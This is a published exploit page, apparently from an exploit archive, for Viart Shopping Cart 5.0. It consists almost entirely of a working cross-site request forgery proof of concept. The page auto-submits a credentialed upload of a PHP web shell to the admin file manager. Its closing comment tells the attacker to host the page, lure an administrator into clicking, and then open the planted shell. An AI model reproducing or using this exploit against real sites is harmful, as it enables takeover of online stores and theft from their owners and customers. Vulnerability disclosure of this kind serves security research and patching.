Home / os / winmobile

Viart Shopping Cart 5.0 CSRF / Shell Upload

Posted on 14 June 2016

<!-- # Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability # Date : 2016/06/12 # Google Dork : Script-Kiddie ;) # Exploit Author : Ali Ghanbari # Vendor Homepage : http://www.viart.com/ # Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html # Version : 5.0 #POC --> <html> <body onload="submitRequest();"> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035"); xhr.withCredentials = "true"; var body = "-----------------------------256672629917035 " + "Content-Disposition: form-data; name="dir_root" " + " " + "../images " + "-----------------------------256672629917035 " + "Content-Disposition: form-data; name="newfile_0"; filename="[shell.php]" " + "Content-Type: application/x-php " + " " + " " + "-----------------------------256672629917035-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> </body> </html> <!-- #Desc: upload exploit code in your host and send link to admin when admin click on link, you can access to your shell from below path : http://localhost/images/[your shell] #################################### [+]Exploit by: Ali Ghanbari [+]My Telegram :@Exploiter007 -->

 

TOP